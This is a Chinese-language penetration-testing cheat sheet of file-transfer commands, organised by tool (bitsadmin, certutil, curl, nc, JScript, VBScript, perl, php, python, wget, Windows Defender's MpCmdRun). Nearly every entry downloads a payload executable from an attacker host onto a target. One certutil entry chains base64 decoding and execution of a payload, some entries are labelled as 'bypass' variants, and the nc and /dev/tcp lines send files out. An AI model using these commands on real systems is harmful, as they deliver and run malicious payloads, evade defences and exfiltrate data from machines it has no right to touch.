【实战】渗透测试下的传输命令

目录

bitsadmin

certutil

curl

ftp

js

nc

perl

php

py

scp

vbs

wget

WindowsDefender

bitsadmin

不支持https、ftp协议，php python带的服务器会出错
>bitsadmin /transfer n http://192.168.1.192/Client.exe  e:\1.exe
>bitsadmin /rawreturn /transfer getfile http://192.168.1.192/Client.exe e:\1.exe
>bitsadmin /rawreturn /transfer getpayload http://192.168.1.192/Client.exe e:\1.exe
>bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.1.192/Client.exe" "e:\1.exe "

certutil

>certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe 
>certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe  1.exe
删除缓存
>certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe delete
查看缓存
>certutil.exe -urlcache *
转为base64
>certutil -encode lcx64.exe lcx64.txt 或>certutil -encode d:\lcx64.exe d:\lcx64.txt(本地执行)
>echo xxxx>>d:\1.txt
解码
>certutil -decode 1.txt lcx64.exe
对文件进行编码下载后解码执行
>base64 payload.exe > /var/www/html/1.txt # 在C&C上生成经base64编码的exe
>certutril -urlcache -split -f http://192.168.0.107/1.txt & certurl -decode 1.txt ms.exe & ms.exe
bypass
>Certutil & Certutil –urlcache –f –split url
>Certutil | Certutil –urlcache –f –split url

curl

>curl -o 1.exe http://192.168.1.192/Client.exe

ftp

>open 192.168.0.98 21
>输入账号密码
>dir查看文件
>get file.txt

js

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false); WinHttpReq.Send(); BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1; BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody); BinStream.SaveToFile("1.exe"); 

>cscript /nologo 1.js http://192.168.1.192/Client.exe

nc

>nc –lvnp 333 >1.txt
目标机
>nc –vn 192.168.1.2 333 <test.txt –q 1
&
>cat 1.txt >/dev/tcp/1.1.1.1/333

perl

#!/usr/bin/perl 
use LWP::Simple; 
getstore("http://192.168.1.192/Client.exe", "1.exe");

php

#!/usr/bin/php 
<?php $data = @file("http://192.168.1.192/Client.exe");
$lf = "1.exe";         
$fh = fopen($lf, 'w');         
fwrite($fh, $data[0]);         
fclose($fh); 
?>

py

>python -c 'import urllib;urllib.urlretrieve("http://192.168.1.192/Client.exe","/path/to/save/1.exe")'

scp

Linux中传输文件
>scp -P 22 file.txt user@1.1.1.1:/tmp

vbs

Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://192.168.1.192/Client.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "C:\1.exe",2 
>cscript 1.vbs
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim http,ado
Set http = CreateObject("Msxml2.serverXMLHTTP")
http.SetOption 2,13056//忽略HTTPS错误
http.open "GET","http://192.168.1.192/Client.exe",False
http.send
Set ado = createobject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
ado.SaveToFile "c:\1.exe"
ado.Close

wget

>wget http://192.168.1.192/Client.exe
>wget –b后台下载
>wget –c 中断恢复

WindowsDefender

C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0>MpCmdRun.exe -DownloadFile -url http://192.168.2.105:8000/payload.c -path c:\\users\\test\\desktop\\1.c

其他利用